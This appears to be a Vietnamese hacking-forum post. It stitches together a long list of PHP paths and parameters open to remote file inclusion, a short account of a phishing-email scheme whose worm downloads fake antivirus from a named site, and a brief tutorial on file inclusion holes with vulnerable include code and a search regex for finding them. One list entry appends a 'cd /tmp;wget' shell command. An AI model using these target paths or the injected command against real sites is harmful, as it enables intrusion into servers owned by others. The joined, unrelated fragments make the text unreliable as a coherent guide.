show_archives.php?cutepath=
gallery.php=
magicforum/misc.php?action=
forum/admin/actions/del.php?include_path=
index.php?meio=
local/investing_industrialeastate1.php?a=
modules/coppermine/themes/default/theme.php?THEME_DIR
Popper/index.php?childwindow.inc.php?form=
class.mysql.php?path_to_bt_dir=
include/footer.inc.php?_AMLconfig[cfg_serverpath]=
eyeos/desktop.php?baccio=
ashnews.php?pathtoashnews=
index.php?modpath=
becommunity/community/index.php?pageurl=
index.php?sqld=
modules/module_db.php?pivot_path=
catalog/includes/include_once.php?include_file=
cgi-bin/calendar.pl?fromTemplate=
live/inc/pipe.php?HCL_path=
zb41/include/write.php?dir=
cgi-bin/awstats.pl?logfile=
presse/stampa.php3?azione=
inc/step_one_tables.php?server_inc=
index.php?mainpage=
phpprojekt/lib/authform.inc.php?path_pre=
captionator.php?GALLERY_BASEDIR=
_head.php?_zb_path=.example.com
achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=
gallery/captionator.php?GALLERY_BASEDIR=.example.com
globals.php3?LangCookie=.example.com
include/msql.php?inc_dir=
include/mssql7.php?inc_dir=
include/mysql.php?inc_dir=
include/oci8.php?inc_dir=
include/postgres.php?inc_dir=
include/postgres65.php?inc_dir=
install.php?phpbb_root_dir=
mantis/login_page.php?g_meta_inc_dir=
page.php?template=
phorum/admin/actions/del.php?include_path=
pollensondage.inc.php?app_path=
user/agora_user.php?inc_dir=
user/ldap_example.php?inc_dir=
userlist.php?ME=.example.com
_functions.php?prefix=
cpcommerce/_functions.php?prefix=
ashnews.php?pathtoashnews=cd /tmp;wget
eblog/blog.inc.php?xoopsConfig[xoops_url]=
b2-tools/gm-2-b2.php?b2inc=
includes/include_once.php?include_file=
modules.php?name=jokeid=
index.php?site=
livehelp/inc/pipe.php?HCL_path=
hcl/inc/pipe.php?HCL_path=
support/faq/inc/pipe.php?HCL_path=
help/faq/inc/pipe.php?HCL_path=
helpcenter/inc/pipe.php?HCL_path=
live-support/inc/pipe.php?HCL_path=
gnu3/index.php?doc=
gnu/index.php?doc=
phpgwapi/setup/tables_update.inc.php?appdir=
includes/calendar.php?phpc_root_path=
includes/setup.php?phpc_root_path=
inc/authform.inc.php?path_pre=
include/authform.inc.php?path_pre=
web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=
web_statistics//tools/send_reminders.php?includedir=
web_statistics//include/write.php?dir=
web_statistics//modules/My_eGallery/public/displayCategory.php?basepath=
web_statistics//calendar/tools/send_reminders.php?includedir=
web_statistics//skin/zero_vote/error.php?dir=
web_statistics//coppercop/theme.php?THEME_DIR=
includes/header.php?systempath=
Gallery/displayCategory.php?basepath=
index.inc.php?PATH_Includes=
nphp/nphpd.php?nphp_config[LangFile]=
ashheadlines.php?pathtoashnews=
demo/includes/init.php?user_inc=
jaf/index.php?show=
inc/shows.inc.php?cutepath=
poll/admin/common.inc.php?base_path=
sources/post.php?fil_config=
bb_lib/checkdb.inc.php?libpach=
include/livre_include.php?chem_absolu=
index.php?pageurl=
derniers_commentaires.php?rep=
modules/coppermine/themes/default/theme.php?THEME_DIR=
coppermine/themes/maze/theme.php?THEME_DIR=
allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
agendax/addevent.inc.php?agendax_path=
main.php?page=
default.php?page=
index.php?action=
index1.php?p=
index2.php?x=
index2.php?content=
index.php?conteudo=
GradeMap/index.php?page=
phpopenchat/contrib/yabbse/poc.php?sourcedir=
calendar/calendar.php?serverPath=
calendar/functions/popup.php?serverPath=
calendar/events/header.inc.php?serverPath=
calendar/events/datePicker.php?serverPath=
calendar/setup/setupSQL.php?serverPath=
calendar/setup/header.inc.php?serverPath=
install/index.php?G_PATH=
support/mailling/maillist/inc/initdb.php?absolute_path=
coppercop/theme.php?THEME_DIR=
dotproject/modules/projects/addedit.php?root_dir=
dotproject/modules/projects/view.php?root_dir=
dotproject/modules/projects/vw_files.php?root_dir=
dotproject/modules/tasks/addedit.php?root_dir=
dotproject/modules/tasks/viewgantt.php?root_dir=
My_eGallery/public/displayCategory.php?basepath=
index.php?meio.php=
index.php?configFile=
index.php?do=
phpshop/index.php?base_dir=
contacts.php?cal_dir=
convert-date.php?cal_dir=
Bạn có nhận ra mối liên hệ giữa 2 email này không?
Thực chất, chúng là cặp email trong cùng một kịch bản của hacker. Kịch bản tương tác diễn ra như sau:
Email đầu tiên không đính kèm file và chỉ có một nhiệm vụ duy nhất là khiến người nhận tin vào một câu chuyện thú vị: có người biết bạn qua Internet, muốn làm quen và sẽ gửi cho bạn vài bức ảnh. Đối với người sử dụng, email này có vẻ như vô hại và chắc chắn không ít người trả lời email kết bạn này.
Không lâu sau đó, người sử dụng sẽ nhận được một email khác, lần này có đính kèm “file ảnh” như đã đề cập trong email trước. Nhiều người sử dụng bị thuyết phục bởi kịch bản khá logic và tương tác này đã mở file đính kèm, và vậy là máy tính của họ bị nhiễm virus.
Virus này (Bkav nhận diện với tên W32.FakeHotpics.Worm) khi được thực thi sẽ download FakeAV từ địa chỉ : http://webcontrol-panel.us/l[removed]atch/softpatch.php?afid=154
I. GIỚI THIỆU
Code:
<?php
include("config.php");
?>
Code:
<?php
include($page);
?>
Lưu ý: Nếu trong cấu hình của PHP (php.ini), register_global mà thiết lập off thì biến $page không được coi như là một biến toàn cục và do vậy nó không thể thay đổi thông qua URL. Và câu lệnh include sẽ phải là $_GET[‘page’], $_POST[‘page’], $_REQUEST[‘page’] hoặc $_COOKIE[‘page’] thay vì $page.
Giả sử trường hợp register_global được thiết lập và lúc này chúng ta sẽ thực hiện chèn trên URL với đối số bất kỳ, khi đó đoạn mã sẽ thực hiện include file mà chúng ta chỉ định, nếu không tồn tại thì sẽ báo lỗi nhưng vẫn thực hiện script.
Một hàm khác của PHP đó là require hoặc require_once cũng có tác dụng tương tự như include nhưng nếu xuất hiện lỗi thì script sẽ ngừng. Sự khác biệt giữa include_once và include hoặc require_once và require là ở chỗ require_once hay include_once là ngăn chặn việc include hay require 1 file mà nhiều lần.
Kiểm tra file robots.txt của website và thực hiện kiểm tra thử website đó với file robots.txt. Ví dụ www.example.com/page=robots.txt để xem cách ứng xử của server về câu truy vấn này.
Có thể sử dụng Google CodeSearch để tìm kiếm các lỗi về File Inclusion bằng biểu thức chính qui như sau :
http://www.google.com/codesearch
lang:php (include|require)(_once)?\s*[‘”(]?\s*\$_(GET|POST|COOKIE)
Tìm hiểu thêm bài viết này tại: http://www.hvaonline.net/hvaonline/posts/list/36793.hva
Ngoài ra, bạn có thể xem thêm :)):CEH.vn
KMA
SinhvienIT
WIKI
Hãy xem sự nguy hiểm của nó :)))))